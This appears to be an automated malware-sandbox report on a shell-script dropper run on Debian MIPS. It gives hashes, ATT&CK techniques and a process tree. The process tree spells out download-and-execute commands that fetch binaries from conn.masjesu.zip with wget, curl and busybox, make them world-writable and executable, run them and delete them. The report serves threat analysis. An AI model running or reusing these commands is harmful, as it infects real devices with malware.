50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a

Analysis

max time kernel
150s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
15-10-2024 01:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Size

10KB
MD5

ec466edc6c1e9e990a5ec3a4f5dc57ec
SHA1

163a1c64d09a52b82963878c6f77cc74cfdabd10
SHA256

50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a
SHA512

c4d304bb42e3c786e9d2eaf7eeb196d6756ce4aa6266bbc6af0ab152926100a5b86a3ca1d8e38cd7c77455be88fb5d2ab952ffd289c0a2a89c8b3c17c90fca88
SSDEEP

96:YLn4L5RnO+Fi69dHdbde7zJUNNTA55RAYL8AyLGCGaG0LXiddhkaS7LokkLEIbxM:LWc2GCNV0LXQoMvXNV0LXWnCx

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 19 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
731	chmod
796	chmod
866	chmod
915	chmod
922	chmod
767	chmod
880	chmod
929	chmod
936	chmod
859	chmod
873	chmod
894	chmod
908	chmod
901	chmod
741	chmod
808	chmod
815	chmod
839	chmod
887	chmod

Executes dropped EXE 19 IoCs

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 60 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
790	busybox
807	busybox
898	curl
918	wget
926	curl
886	busybox
897	wget
734	wget
772	wget
819	curl
872	busybox
877	curl
828	busybox
891	curl
939	wget
865	busybox
876	wget
925	wget
763	busybox
862	wget
905	curl
727	busybox
870	curl
907	busybox
912	curl
708	wget
738	busybox
747	wget
935	busybox
883	wget
932	wget
942	busybox
921	busybox
736	curl
814	busybox
845	wget
869	wget
904	wget
778	curl
804	curl
811	wget
863	curl
900	busybox
812	curl
893	busybox
911	wget
753	curl
858	busybox
884	curl
933	curl
940	curl
879	busybox
722	curl
928	busybox
919	curl
802	wget
818	wget
851	curl
890	wget
914	busybox

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	curl
File opened for modification	/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	curl
File opened for modification	/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	curl
File opened for modification	/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	curl
File opened for modification	/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	curl
File opened for modification	/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	curl
File opened for modification	/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	curl
File opened for modification	/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	curl
File opened for modification	/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	curl
File opened for modification	/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	curl
File opened for modification	/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	curl
File opened for modification	/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	curl
File opened for modification	/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	curl
File opened for modification	/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	curl
File opened for modification	/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	curl
File opened for modification	/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	curl
File opened for modification	/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	curl
File opened for modification	/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	curl
File opened for modification	/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	curl
File opened for modification	/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	curl

/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
1⤵
PID:699
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:705
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:708
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:722
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:727
- /bin/chmod
  chmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  ./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Executes dropped EXE
  PID:732
- /bin/rm
  rm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  PID:733
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - System Network Configuration Discovery
  PID:734
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:736
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - System Network Configuration Discovery
  PID:738
- /bin/chmod
  chmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  ./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Executes dropped EXE
  PID:742
- /bin/rm
  rm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  PID:745
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:747
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:763
- /bin/chmod
  chmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  ./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Executes dropped EXE
  PID:768
- /bin/rm
  rm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  PID:771
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - System Network Configuration Discovery
  PID:772
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:778
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - System Network Configuration Discovery
  PID:790
- /bin/chmod
  chmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  ./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Executes dropped EXE
  PID:797
- /bin/rm
  rm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  PID:801
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - System Network Configuration Discovery
  PID:802
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:804
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - System Network Configuration Discovery
  PID:807
- /bin/chmod
  chmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  ./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/rm
  rm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  PID:810
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - System Network Configuration Discovery
  PID:811
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - System Network Configuration Discovery
  PID:814
- /bin/chmod
  chmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  ./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Executes dropped EXE
  PID:816
- /bin/rm
  rm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  PID:817
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:818
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:819
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:828
- /bin/chmod
  chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Executes dropped EXE
  PID:840
- /bin/rm
  rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  PID:844
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:845
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:851
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:858
- /bin/chmod
  chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Executes dropped EXE
  PID:860
- /bin/rm
  rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:861
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:862
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:863
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:865
- /bin/chmod
  chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Executes dropped EXE
  PID:867
- /bin/rm
  rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  PID:868
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:869
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:870
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:872
- /bin/chmod
  chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Executes dropped EXE
  PID:874
- /bin/rm
  rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  PID:875
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:876
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:877
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:879
- /bin/chmod
  chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  PID:882
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:883
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:884
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:886
- /bin/chmod
  chmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  ./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Executes dropped EXE
  PID:888
- /bin/rm
  rm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  PID:889
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - System Network Configuration Discovery
  PID:890
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:891
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - System Network Configuration Discovery
  PID:893
- /bin/chmod
  chmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  ./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Executes dropped EXE
  PID:895
- /bin/rm
  rm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  PID:896
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - System Network Configuration Discovery
  PID:897
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:898
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - System Network Configuration Discovery
  PID:900
- /bin/chmod
  chmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  ./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  PID:903
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:904
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:907
- /bin/chmod
  chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  PID:910
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:911
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:914
- /bin/chmod
  chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:917
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:918
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:921
- /bin/chmod
  chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Executes dropped EXE
  PID:923
- /bin/rm
  rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  PID:924
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:925
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:926
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:928
- /bin/chmod
  chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - File and Directory Permissions Modification
  PID:929
- /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Executes dropped EXE
  PID:930
- /bin/rm
  rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  PID:931
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:932
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:933
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:935
- /bin/chmod
  chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  PID:938
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:939
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:940
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:942

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	732	MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	742	59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	768	4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	797	wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	809	eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	816	B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	840	GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	860	OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	867	g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	874	zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	881	28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	888	TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	895	RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	902	zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	909	GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
